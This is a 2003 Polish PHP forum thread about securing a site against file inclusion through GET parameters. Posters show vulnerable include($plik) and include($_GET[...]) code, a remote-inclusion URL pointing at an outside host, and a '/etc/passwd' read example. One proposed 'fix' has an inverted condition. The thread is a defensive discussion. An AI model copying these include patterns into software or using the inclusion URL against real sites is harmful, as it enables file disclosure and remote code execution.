 zabezpieczenia |
| zabezpieczenia |
Post
#1
|
|
|
Grupa: Zarejestrowani Postów: 24 Pomógł: 0 Dołączył: 14.10.2003 Ostrzeżenie: (0%) 
 |
Ostatnio dużo czytałem o zabezpieczeniech danych przesyłanych drogą post i get
Nawet w prowadzonym przez mnie serwisie stosując stare techniki ktoś odczytał plik d.php gdzie przechowywane sa hasła i zaproponował mi zmainą poniższego kodu na następujący [php:1:38b804c758]<?php if ((!isset($plik)) || ($plik=="")) { include("aktualnosci.php"); } else { include($plik); } ?>[/php:1:38b804c758] na następujący [php:1:38b804c758]<?php $plik = $HTTP_GET_VARS['plik']; if ($plik||!file_exists($plik)) { include("aktualnosci.php"); } else { include($plik); } ?>[/php:1:38b804c758] Czy to jest poprawne i nie ma zadnego haka i jak bylo to mozliew ze sprawdzili moje hasła ___ [scanner] Zmoderowane. Prosze używac BBCode |
 |
 
|
 |
|
Post
#2
|
|
|
Grupa: Zarejestrowani Postów: 560 Pomógł: 0 Dołączył: 15.07.2003 Skąd: Kwidzyn Ostrzeżenie: (0%)
|
hmm no wlasnie trapi mi pewna sprawa jak kto robi
[php:1:c24b7d2059]<?php include ($_GET['costam']); ?>[/php:1:c24b7d2059] no to mozliwe jest podpiecie skrypty tak?? http://twoja.strona.pl/?costam=http://bad....ode.pl/code.php no ale przeciez skrypt nie zostanie przeslany jako "skrypt" tylko jako wynik dzialania skryptu, tzn chodzi mi o to jezeli plik code.php ma taka zawarosc: [php:1:c24b7d2059]<?php $kiszka='tralala bla bla bla'; echo $kiszka; ?>[/php:1:c24b7d2059] no to podstawienie code.php w includa wstawi tam "tralala bla bla bla" a nie $kiszka='tralala bla bla bla'; echo $kiszka; czy sie myle?? jednym slowem (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) server nie moze wyslac jawnego kodu php tylko jego wynik dzialania chyba ze w pliku code.php uzyje sie jakiegos tajemniczego parsowania czy czegos takiego :| |
|
|
|
madalena zabezpieczenia 20.10.2003, 10:11:29 
Zepco IMHO ten drugi zapis jest bezpieczny.
Natomiast w ... 20.10.2003, 11:04:21 spenalzo <?php
if(!file_exists($plik))
{
include("404.p... 20.10.2003, 11:15:09 kwiateek Cytat<?php
if(!file_exists($plik))
{
include("... 20.10.2003, 20:55:41 spenalzo W takim przypadku:
<?php
$plik = '/etc/passwd';... 20.10.2003, 21:30:29 KaMeLeOn Panowie Miramar i PrZeMoL...
Uwagami na temat wypo... 21.10.2003, 00:00:21 madalena wyjasnijcie mi jeszcze jakim cudem koles odczytal ... 21.10.2003, 14:40:45 CyklOP CytatIMHO ten drugi zapis jest bezpieczny.
Natomia... 21.10.2003, 16:22:59 Kinool no chyba troche zakreciles Cyklop jesli np za mam... 21.10.2003, 19:49:11 CyklOP Teoretycznie tak, ale wlasnie on jakos umozliwia t... 21.10.2003, 20:11:12 marcin96 Cytat[..]a jego wynik zostanie przeslany na server... 21.10.2003, 20:31:16 jono ja sobie to rozwiązałem zapisując w tablicy na szt... 22.10.2003, 07:16:58 
bulek A moze skorzystac z funckji basename ktora wyciagn... 23.10.2003, 07:53:21  |
|
Aktualny czas: 6.10.2025 - 14:49 |
